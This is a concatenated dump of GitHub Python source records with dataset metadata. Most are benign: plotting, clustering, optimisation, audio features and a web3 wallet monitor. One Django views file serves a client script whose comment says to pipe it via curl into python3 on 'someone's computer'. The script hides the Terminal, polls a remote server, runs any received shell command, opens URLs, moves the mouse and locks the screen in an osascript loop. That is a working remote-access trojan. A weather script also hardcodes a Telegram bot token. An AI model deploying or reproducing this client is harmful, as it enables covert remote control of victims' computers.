\n \n", "repo_name": "isokolov/qap_telegrambot", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 2017, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "config.keys", "line_number": 18, "usage_type": "name"}, {"api_name": "config.keys", "line_number": 23, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 31, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 33, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 34, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 35, "usage_type": "call"}]}
+{"seq_id": "38579004117", "text": "import requests\n\nbot = '5699740380:AAH8f6hNtBnCs_-fqN9e7WOB94FNBgkwJdA'\ncity = input('Введите название города: ')\nurl_text = f'https://wttr.in/{city}?M'\nurl_png = f'https://wttr.in/{city}_0pM.png'\n\nprint(requests.get(url_text).text)\n\nwith open(r'C:\\Users\\Roman\\Desktop\\GEEK\\Block_2\\Phyton\\DZ\\DZ_9\\Task_4\\imag.png', 'wb') as file:\n file.write(requests.get(url_png).content)\n \nrequests.get(f'https://api.telegram.org/bot{bot}/sendPhoto', params = dict(chat_id = '864101142'), files = {'photo': open('imag.png', 'rb')})", "repo_name": "RomanBusygin/Sem_Python", "sub_path": "DZ_9/Task_4/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 543, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "requests.get", "line_number": 8, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 11, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 13, "usage_type": "call"}]}
+{"seq_id": "70582887768", "text": "# function to plot a matrix of activations: regions x task conditions\nimport matplotlib.colors as colors\nimport matplotlib as mpl\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\ndef plotActivations(activations, title, functional_networks=True, no_ylabel=False, network_color_bar=False):\n\n # for the weights colorbar: red positive, blue negative\n v_min = np.min(activations)\n v_max = np.max(activations)\n v_mid = 0\n # define the figure and the axes\n fig,ax = plt.subplots()\n \n # to plot regions ordered by networks\n # Glasser 360 cortex parcellation ordered into functional networks reported in Ji et al., (2019)\n # path where the network file is: it contains labels (first column) and order (second column) \n #current_dir = os.getcwd()\n #net_file_path = f'{current_dir}/aux_files/networks_labels.txt'\n net_file_path = 'networks_labels.txt'\n net_file = np.loadtxt(net_file_path,delimiter=',')\n \n \n if functional_networks == True:\n # to assign each of the 360 nodes to its corresponding network\n # make as integer and subtract 1, so the indices start in 0, as Python requires.\n net_order = net_file[:,1].astype(int) - 1\n \n elif functional_networks == False:\n # no order by networks. keep the order of the dataset\n net_order = np.arange(activations.shape[0])\n \n # plot the data\n img = ax.imshow(activations[net_order,:],\n origin = 'upper',\n cmap='seismic',\n alpha = 1,\n clim=(v_min, v_max), \n norm=MidpointNormalize(midpoint=v_mid,vmin=v_min, vmax=v_max),\n aspect='auto',\n interpolation='none'\n )\n plt.title(title,fontsize=18)\n \n task_conditions = ['EMOTION:fear','EMOTION:neut','GAMBLING:win','GAMBLING:loss','LANGUAGE:story','LANGUAGE:math',\n 'MOTOR:cue','MOTOR:lf','MOTOR:rf','MOTOR:lh','MOTOR:rh','MOTOR:t','REASONING:rel',\n 'REASONING:match','SOCIAL:mental','SOCIAL:rnd','WM 0bk:body','WM 0bk:faces','WM 0bk:places',\n 'WM 0bk:tools','WM 2bk:body','WM 2bk:faces','WM 2bk:places','WM 2bk:tools']\n \n plt.xticks(np.arange(24),labels=task_conditions,rotation=90)\n ax.tick_params(labelsize=11,length=0.01)\n # axes ticks labels\n a = np.round(activations.shape[0]/2).astype(int)\n b = np.round(activations.shape[0])\n # plt.xticks([1,a,b])\n plt.yticks([1,a,b])\n plt.ylabel('360 Regions\\n (12 networks)',fontsize=15)\n # labels font size and length of the ticks\n # Thickness of the connectivity matrix border\n for axis in ['top','bottom','left','right']:\n ax.spines[axis].set_linewidth(0)\n # properties of the weights colorbar\n cbar = plt.colorbar(img,pad=0.01)\n cbar.ax.tick_params(labelsize=13)\n cbar.outline.set_linewidth(0)\n \n if no_ylabel == True:\n plt.yticks([])\n plt.ylabel('')\n \n if network_color_bar == True:\n network_palette = ['royalblue','slateblue','paleturquoise','darkorchid','limegreen',\n 'lightseagreen','yellow','orchid','r','peru','orange','olivedrab']\n network_palette = np.asarray(network_palette)\n #define the colormap as an independent graphical object\n cmap = mpl.colors.ListedColormap(network_palette)\n #number of nodes (size) in each of the 12 networks\n size_networks=[]\n #path where the network file is: it contains labels (first column) and order (second column)\n net_labels = net_file[:,0].astype(int)\n #loop through all the labels: 1 to 12 to count the number of nodes\n for i in range(np.max(net_labels)):\n size_networks.append(np.sum(net_labels==i+1))\n #the bounds of the bar are the cumulative sum for each network size starting at zero: \n #ie, 0, 6, 6+54, 6+54+39, etc...\n su = 0\n #the first element of the networks bar bounds is zero\n bounds = [0]\n #this loop makes the cumulative sums\n for i in range(np.max(net_labels)):\n su += size_networks[i]\n bounds.append(su)\n #define the size of the color blocks according to the bounds (ie. the number of nodes)\n norm = mpl.colors.BoundaryNorm(bounds, cmap.N)\n\n #get the size and position of the connectivity matrix as a reference \n #to position the networks color bars\n l, b, w, h = ax.get_position().bounds\n\n ax2 = fig.add_axes([l/1.105,b,w/25,h])\n\n cbNet = mpl.colorbar.ColorbarBase(ax2, cmap=cmap,\n norm=norm,\n spacing='proportional',\n orientation='vertical')\n cbNet.outline.set_linewidth(0)\n cbNet.set_ticks([])\n cbNet.ax.invert_yaxis() \n #flip the colorbar so it follow the network order\n ax.tick_params(axis='y',labelsize=14,pad=18,length=0.01)\n \n \n\nclass MidpointNormalize(colors.Normalize):\n \"\"\"\n Normalise the colorbar so that diverging bars work there way either side from a prescribed midpoint value)\n e.g. im=ax1.imshow(array, norm=MidpointNormalize(midpoint=0.,vmin=-100, vmax=100))\n \"\"\"\n def __init__(self, vmin=None, vmax=None, midpoint=None, clip=False):\n self.midpoint = midpoint\n colors.Normalize.__init__(self, vmin, vmax, clip)\n\n def __call__(self, value, clip=None):\n \n # I'm ignoring masked values and all kinds of edge cases to make a\n # simple example...\n x, y = [self.vmin, self.midpoint, self.vmax], [0, 0.5, 1]\n return np.ma.masked_array(np.interp(value, x, y), np.isnan(value))\n", "repo_name": "ColeLab/DirectedActflow_release", "sub_path": "plotActivations.py", "file_name": "plotActivations.py", "file_ext": "py", "file_size_in_byte": 5747, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.min", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "numpy.loadtxt", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 71, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.colors.ListedColormap", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.colors", "line_number": 78, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.colors.BoundaryNorm", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.colors", "line_number": 96, "usage_type": "attribute"}, {"api_name": "matplotlib.colorbar.ColorbarBase", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.colorbar", "line_number": 104, "usage_type": "attribute"}, {"api_name": "matplotlib.colors.Normalize", "line_number": 116, "usage_type": "attribute"}, {"api_name": "matplotlib.colors", "line_number": 116, "usage_type": "name"}, {"api_name": "matplotlib.colors.Normalize.__init__", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.colors.Normalize", "line_number": 123, "usage_type": "attribute"}, {"api_name": "matplotlib.colors", "line_number": 123, "usage_type": "name"}, {"api_name": "numpy.ma.masked_array", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 130, "usage_type": "attribute"}, {"api_name": "numpy.interp", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 130, "usage_type": "call"}]}
+{"seq_id": "14715172233", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri May 31 22:20:41 2019\r\n\r\n@author: GANGADHAR\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pylab as plt\r\nfrom sklearn.cluster import KMeans\r\nfrom scipy.spatial.distance import cdist\r\n\r\nflight=pd.read_excel('C:\\\\Users\\\\GANGADHAR\\\\Desktop\\\\sainath assignments\\\\Rcodes\\\\clustering\\\\flight.xlsx')\r\n\r\ndef norm_func(i):\r\n x=(i-i.min())/(i.max()-i.min())\r\n return(x)\r\n \r\ndf_norm=norm_func(flight.iloc[:,1:])\r\n\r\nk=list(range(10,20))\r\nk\r\nTWSS=[]\r\nfor i in k:\r\n kmeans = KMeans(n_clusters = i)\r\n kmeans.fit(df_norm)\r\n WSS = [] \r\n for j in range(i):\r\n WSS.append(sum(cdist(df_norm.iloc[kmeans.labels_==j,:],kmeans.cluster_centers_[j].reshape(1,df_norm.shape[1]),\"euclidean\")))\r\n TWSS.append(sum(WSS))\r\nTWSS\r\n\r\nplt.plot(k,TWSS, 'ro-');plt.xlabel('number of clusters');plt.ylabel('total within sum of squares');plt.xticks(k)\r\n \r\nmodel1=KMeans(n_clusters=14)\r\nmodel1.fit(df_norm)\r\n\r\nmodel1.cluster_centers_\r\nmodel1.labels_\r\nmodel=pd.Series(model1.labels_)\r\nmodel\r\nflight['clust']=model\r\n\r\n\r\n\r\nflightfinal=flight.iloc[:,[12,0,1,2,3,4,5,6,7,8,9,10,11]]\r\n\r\nfly=flight.iloc[:,1:13].groupby(flightfinal.clust).mean()\r\n\r\nflightfinal.to_csv(\"flightfinalkmewa.csv\",encoding=\"utf-8\")\r\n", "repo_name": "kpradyumna095/Clustering---Airline-Dataset-Using-Python", "sub_path": "EWAkmeans.py", "file_name": "EWAkmeans.py", "file_ext": "py", "file_size_in_byte": 1260, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.read_excel", "line_number": 14, "usage_type": "call"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 26, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.cdist", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pylab.plot", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pylab.xlabel", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pylab.ylabel", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pylab.xticks", "line_number": 34, "usage_type": "call"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 36, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 41, "usage_type": "call"}]}
+{"seq_id": "18023557420", "text": "import sys,os\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nfrom encapsulation.Golden_cut import golden_cut\nfrom encapsulation.Plot import plot\nfrom encapsulation.Stop_condition import stop_condition\nfrom encapsulation.test_function import f,x_0\n\nimport numpy as np\nfrom autograd import grad,hessian\n\ndef newton(f, x_0,eps=1e-3):\n k = 0 # 迭代次数\n condition = 1 # 结束迭代的条件\n x_list = [x_0]\n y_list = [f(x_0)]\n x = x_0\n n=len(x)\n while condition > eps:\n hessian_f = hessian(f)(x) # 黑塞矩阵\n grad_f = grad(f)(x)\n # 求特征值, 如果存在负特征值则给所有的特征值都加上一个mu\n sigma=np.linalg.eigvals(hessian_f)\n m=np.min(sigma)\n mu=0\n if m<0: mu=(-m)+1\n hessian_f+=(mu*np.identity(n))\n direction=np.linalg.inv(hessian_f)@grad_f\n def phi(step): return f(x-step*direction)\n step_best = golden_cut(phi, 0, 100, 1e-5)\n delta=step_best*direction\n condition=stop_condition(delta,x)\n x = x-delta\n x_list.append(x)\n y_list.append(f(x))\n k += 1\n print(\"Total iterations:\", k)\n return x_list,y_list\n\nx_list, y_list = newton(f, x_0, 1e-3)\nprint(x_list,y_list)\nplot(x_list, y_list, 2)", "repo_name": "baoduoxu/OptimizationAlgorithm", "sub_path": "unconstrained_optimization/second_order_method/newton_amend.py", "file_name": "newton_amend.py", "file_ext": "py", "file_size_in_byte": 1292, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sys.path.append", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 2, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 2, "usage_type": "call"}, {"api_name": "encapsulation.test_function.x_0", "line_number": 14, "usage_type": "name"}, {"api_name": "encapsulation.test_function.f", "line_number": 15, "usage_type": "call"}, {"api_name": "encapsulation.test_function.x_0", "line_number": 15, "usage_type": "argument"}, {"api_name": "encapsulation.test_function.x_0", "line_number": 16, "usage_type": "name"}, {"api_name": "autograd.hessian", "line_number": 19, "usage_type": "call"}, {"api_name": "encapsulation.test_function.f", "line_number": 19, "usage_type": "argument"}, {"api_name": "autograd.grad", "line_number": 20, "usage_type": "call"}, {"api_name": "encapsulation.test_function.f", "line_number": 20, "usage_type": "argument"}, {"api_name": "numpy.linalg.eigvals", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.min", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.identity", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 27, "usage_type": "attribute"}, {"api_name": "encapsulation.test_function.f", "line_number": 28, "usage_type": "call"}, {"api_name": "encapsulation.Golden_cut.golden_cut", "line_number": 29, "usage_type": "call"}, {"api_name": "encapsulation.Stop_condition.stop_condition", "line_number": 31, "usage_type": "call"}, {"api_name": "encapsulation.test_function.f", "line_number": 34, "usage_type": "call"}, {"api_name": "encapsulation.test_function.f", "line_number": 39, "usage_type": "argument"}, {"api_name": "encapsulation.test_function.x_0", "line_number": 39, "usage_type": "argument"}, {"api_name": "encapsulation.Plot.plot", "line_number": 41, "usage_type": "call"}]}
+{"seq_id": "8204132060", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse, JsonResponse\nimport sqlite3 \n# Create your views here.\n\n#RUN curl https://macnetback-nylr.c9users.io/getc | python3 to run on someone's computer \n\n# conn = sqlite3.connect(\"messages.db\")\n# c = conn.cursor()\n# c.execute(\"DROP TABLE saved\")\n# c.execute('''CREATE TABLE IF NOT EXISTS saved (content TEXT, type INTEGER, id INTEGER)''')\n# conn.commit()\n\nfrom django.views.decorators.csrf import csrf_exempt\n\ncurrent_position = []\nrequested_position = []\nuservolval = [0]\n\n@csrf_exempt \ndef messages(request):\n conn = sqlite3.connect(\"messages.db\")\n c = conn.cursor() \n if request.method == \"POST\": #posting from app\n data = request.POST[\"message\"]\n dtype = request.POST[\"type\"]\n did = request.POST[\"id\"]\n c.execute(\"DELETE FROM saved\")\n c.execute('''INSERT INTO saved VALUES (?, ?, ?)''', (data, dtype, did,))\n conn.commit() \n return HttpResponse(\"OK\")\n else: #reading from python script\n resp = []\n for element in c.execute(\"select content, type, id from saved\"):\n resp.append({\"message\": element[0], \"type\": element[1], \"id\": element[2]})\n return JsonResponse(resp, safe=False)\n c.close()\n \ndef requestPurge(request):\n conn = sqlite3.connect(\"messages.db\")\n c = conn.cursor() \n c.execute(\"DELETE FROM saved\")\n conn.commit()\n return HttpResponse(\"Done\")\n \n@csrf_exempt\ndef uservol(request): #get and post \n if request.method == \"POST\":\n uservolval[0] = request.POST[\"message\"]\n return HttpResponse(\"OK\")\n else:\n return HttpResponse(str(uservolval[0]))\n@csrf_exempt\ndef VolAndPos(request): #get and post \n if request.method == \"POST\":\n if request.POST[\"source\"] == \"mobile\":\n reqposdata = list(map(float, request.POST[\"message\"].split(\":\")))\n requested_position.append(reqposdata[0])\n requested_position.append(reqposdata[1])\n elif request.POST[\"source\"] == \"comp\":\n current_position[0] = request.POST[\"x\"]\n current_position[1] = request.POST[\"y\"]\n return HttpResponse(\"OK\")\n if request.method == \"GET\":\n if len(requested_position) > 0:\n data = [{\"x\": requested_position[0], \"y\": requested_position[1]}]\n del requested_position[0]\n del requested_position[0]\n print(requested_position)\n return JsonResponse(data, safe=False)\n else:\n return JsonResponse([], safe=False)\n \n@csrf_exempt \ndef getc(request):\n return HttpResponse(\"\"\"import os, sys\nimport time, requests, json\nimport subprocess \n\nos.system('''osascript -e 'tell application \"System Events\" to tell process \"Terminal\" to keystroke \"h\" using command down' ''')\n\nos.system(\"pip install pyautogui\")\nos.system(\"pip install pyobjc-core\")\nos.system(\"pip install pyobjc-framework-Quartz\")\n\nos.system(\"pip3 install pyautogui\")\nos.system(\"pip3 install pyobjc-core\")\nos.system(\"pip3 install pyobjc-framework-Quartz\") \n\n\n\nimport pyautogui as pg\n\nSIZE = pg.size()\nSIZEX = SIZE[0]\nSIZEY = SIZE[1]\n\ndef moveToLocation(x, y):\n\tpg.moveTo(x, y, 0.2)\n\n\ndef openURL(openurl):\n\tos.system('''osascript -e 'tell application \"Safari\" to activate' ''')\n\tos.system('''osascript -e 'tell application \"Safari\" to open location \"{}\"' '''.format(openurl))\n\ndef createAlert(text):\n\tos.system('''osascript -e 'tell application \"Finder\" to activate' ''')\n\tos.system('''osascript -e 'tell application \"Finder\" to display alert \"{}\"' '''.format(text))\n\ndef execute(cmd):\n\tos.system(cmd)\n\ndef cvol(newnum):\n\tos.system('''osascript -e 'set volume output volume {}' '''.format(newnum))\n\ndef getCurrent():\n\treturn str(pg.position())\n\ndef disableComputer():\n\t\tos.popen('''osascript -e 'repeat \n\t\t\t\t\t\ttell application \"Preview\" to activate \n\t\t\t\t\t\ttell application \"Safari\" to activate\n\t\t\t\t\t\ttell application \"Terminal\" to activate\n\t\t\t\t\tend repeat' ''')\n\ndef enableComputer():\n\tos.system(\"killall osascript\")\n\nwhile True:\n try:\n \ttime.sleep(0.01)\n \tr = requests.get(\"https://macnetback-nylr.c9users.io/\")\n \tr_mav = json.loads(requests.get(\"https://macnetback-nylr.c9users.io/volandpos\").text)\n \tr_vol = requests.get(\"https://macnetback-nylr.c9users.io/uvol\").text \n \tcvol(r_vol)\n \n \n \tif len(r_mav) > 0: #mouse related \n \t\tlocdata = r_mav[0]\n \t\tmoveToLocation(locdata[\"x\"]*SIZEX, locdata[\"y\"]*SIZEY)\n\n \ttry:\n \t\tdata = json.loads(r.text)[0]\n \texcept:\n \t\tcontinue\n \tmessageType = data[\"type\"]\n \tmessageDirections = data[\"message\"]\n \tmessageId = data[\"id\"]\n \n \tprint(r_mav)\n \tif messageType == 1: #open url \n \t\topenURL(messageDirections)\n \telif messageType == 2: #create alert \n \t\tcreateAlert(messageDirections)\n \telif messageType == 3: #execute\n \t\texecute(messageDirections)\n \telif messageType == 4: #volume related \n \t\tpass \n \telif messageType == 5:\n \t print(messageDirections)\n \t if messageDirections == \"true\":\n \t disableComputer()\n \t else:\n \t enableComputer()\n \telif messageType == 6:\n \t os.system(\"pmset displaysleepnow\")\n \trequests.get(\"https://macnetback-nylr.c9users.io/purge\")\n except Exception as e:\n print(str(e))\"\"\", content_type=\"text/plain\")\n\t\n", "repo_name": "ThanHuuTuan/CSFinal", "sub_path": "djangosrc/api/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 5317, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sqlite3.connect", "line_number": 22, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 31, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 36, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 20, "usage_type": "name"}, {"api_name": "sqlite3.connect", "line_number": 40, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 44, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 50, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 52, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 46, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 63, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 70, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 72, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 53, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 76, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 74, "usage_type": "name"}]}
+{"seq_id": "34192695671", "text": "import librosa\nimport librosa.display\nimport scipy.io.wavfile as wavf\nimport numpy as np\nimport wave\nimport soundfile as sf\nimport os, sys, csv, re\n\ndef extract_feature(X, sample_rate):\n #X, sample_rate = librosa.load(file_name)\n\n # sftf\n stft = np.abs(librosa.stft(X))\n\n # mfcc\n mfccs = np.mean(librosa.feature.mfcc(y=X, sr=sample_rate, n_mfcc=40).T,axis=0)\n\n # chroma\n chroma = np.mean(librosa.feature.chroma_stft(S=stft, sr=sample_rate).T,axis=0)\n\n # melspectrogram\n mel = np.mean(librosa.feature.melspectrogram(X, sr=sample_rate).T,axis=0)\n\n # spectral contrast\n contrast = np.mean(librosa.feature.spectral_contrast(S=stft, sr=sample_rate).T,axis=0)\n\n tonnetz = np.mean(librosa.feature.tonnetz(y=librosa.effects.harmonic(X), sr=sample_rate).T,axis=0)\n return mfccs,chroma,mel,contrast,tonnetz\n\ndef print_wave_info(file_name):\n wf = wave.open(file_name, \"r\")\n chan = wf.getnchannels()\n swidth = wf.getsampwidth()\n sfreq = wf.getframerate()\n nframes = wf.getnframes()\n params = wf.getparams()\n time = float(wf.getnframes()) / wf.getframerate()\n return chan,swidth,sfreq,nframes,params,time\n\n", "repo_name": "sayanmndl21/ssloc", "sub_path": "feature_extraction/fextract.py", "file_name": "fextract.py", "file_ext": "py", "file_size_in_byte": 1157, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.abs", "line_number": 13, "usage_type": "call"}, {"api_name": "librosa.stft", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 16, "usage_type": "call"}, {"api_name": "librosa.feature.mfcc", "line_number": 16, "usage_type": "call"}, {"api_name": "librosa.feature", "line_number": 16, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 19, "usage_type": "call"}, {"api_name": "librosa.feature.chroma_stft", "line_number": 19, "usage_type": "call"}, {"api_name": "librosa.feature", "line_number": 19, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 22, "usage_type": "call"}, {"api_name": "librosa.feature.melspectrogram", "line_number": 22, "usage_type": "call"}, {"api_name": "librosa.feature", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 25, "usage_type": "call"}, {"api_name": "librosa.feature.spectral_contrast", "line_number": 25, "usage_type": "call"}, {"api_name": "librosa.feature", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 27, "usage_type": "call"}, {"api_name": "librosa.feature.tonnetz", "line_number": 27, "usage_type": "call"}, {"api_name": "librosa.feature", "line_number": 27, "usage_type": "attribute"}, {"api_name": "librosa.effects.harmonic", "line_number": 27, "usage_type": "call"}, {"api_name": "librosa.effects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "wave.open", "line_number": 31, "usage_type": "call"}]}
+{"seq_id": "3400862851", "text": "from django.http import StreamingHttpResponse\nfrom model.microexpression_recognition.demo import demo\nimport cv2\n\ndef expression_recognition(requests):\n def frame_generator():\n for frame in demo('model/microexpression_recognition/model', True):\n ret, jpeg = cv2.imencode('.jpg', frame)\n frame_data = jpeg.tobytes()\n\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame_data + b'\\r\\n\\r\\n')\n return StreamingHttpResponse(frame_generator(),\n content_type='multipart/x-mixed-replace; boundary=frame')\n", "repo_name": "xueqili02/family-monitor-server", "sub_path": "microexpression/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 608, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "model.microexpression_recognition.demo.demo", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.imencode", "line_number": 8, "usage_type": "call"}, {"api_name": "django.http.StreamingHttpResponse", "line_number": 13, "usage_type": "call"}]}
+{"seq_id": "28138180859", "text": "# 4, 3, 1, 2, 5 기사 원하는 순서\n# 1, 2, 3, 4, 5 영수가 받는 순서\n# --------------\n# [3, 2, 1]\n# [4]\n# --------------\n# [2, 1]\n# [4, 3] 1을 실어야 되지만 2가 있어 여기서 stop -> result : 2\nfrom collections import deque\n\n\ndef solution(order):\n answer = 0\n l = len(order)\n boxes, order = deque([i for i in range(1, l+1)]), deque(order)\n tmp_boxes = []\n\n while boxes:\n now_box = boxes.popleft()\n # 지금 박스와 order[0] 같다면 popleft\n if now_box == order[0]:\n answer += 1\n order.popleft()\n if not boxes and tmp_boxes:\n boxes.append(tmp_boxes.pop())\n # 아니라면 임시 박스 우선 확인 후 여기도 없다면 넣음\n else:\n if tmp_boxes and tmp_boxes[-1] == order[0]:\n tmp_boxes.pop()\n order.popleft()\n boxes.appendleft(now_box)\n answer += 1\n else:\n tmp_boxes.append(now_box)\n\n return answer\n", "repo_name": "ggramgyo/PS_STUDY", "sub_path": "programmers/택배상자.py", "file_name": "택배상자.py", "file_ext": "py", "file_size_in_byte": 1030, "program_lang": "python", "lang": "ko", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "collections.deque", "line_number": 15, "usage_type": "call"}]}
+{"seq_id": "2209031367", "text": "## You can use the web3.eth.getTransaction method to retrieve information about a specific transaction, and web3.eth.getBlock method to retrieve information about a specific block.\n## This code will retrieve the latest block number and then retrieve the last 10 blocks, checking each transaction in each block to see if it is related to your first wallet (either sending from or receiving to the wallet). \n## If it is, it will log the transaction details to the console.\n\nimport web3\n\nasync def monitor_transaction_history():\n w3 = web3.Web3(web3.HTTPProvider('https://mainnet.infura.io/v3/YOUR-PROJECT-ID'))\n latest_block = w3.eth.blockNumber\n print(f\"Latest block number: {latest_block}\")\n\n for i in range(latest_block, latest_block-10, -1):\n block = w3.eth.getBlock(i, True)\n\n for transaction in block['transactions']:\n if transaction['to'] == first_wallet_address or transaction['from'] == first_wallet_address:\n print(\"Transaction found:\")\n print(transaction)\n", "repo_name": "rockstarcoder333/Wallet_monitoring", "sub_path": "monitor_wallet_web3.py", "file_name": "monitor_wallet_web3.py", "file_ext": "py", "file_size_in_byte": 1032, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "web3.Web3", "line_number": 8, "usage_type": "call"}, {"api_name": "web3.HTTPProvider", "line_number": 8, "usage_type": "call"}]}
+{"seq_id": "38728635449", "text": "import json\n\nfrom django.http import Http404, HttpResponse, HttpResponseRedirect\nfrom django.template.response import TemplateResponse\nfrom django.views.decorators.cache import cache_control\nfrom django.views.decorators.vary import vary_on_cookie\nfrom django.views.generic import DeleteView\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom django.contrib import messages\nfrom django import forms\nfrom django.forms.models import inlineformset_factory\nfrom django.core.urlresolvers import reverse\nfrom django.conf import settings\nfrom django.contrib.gis.utils import GeoIP\n\nfrom bootstrap.forms import BootstrapModelForm\n\nfrom traveldash.mine.models import Dashboard, DashboardRoute, City\nfrom traveldash.gtfs.models import Route, Stop\n\n\n@vary_on_cookie\ndef home(request):\n if request.user.is_authenticated():\n # if user is signed in, take them to their most recent\n # dashboard unless they have a referer 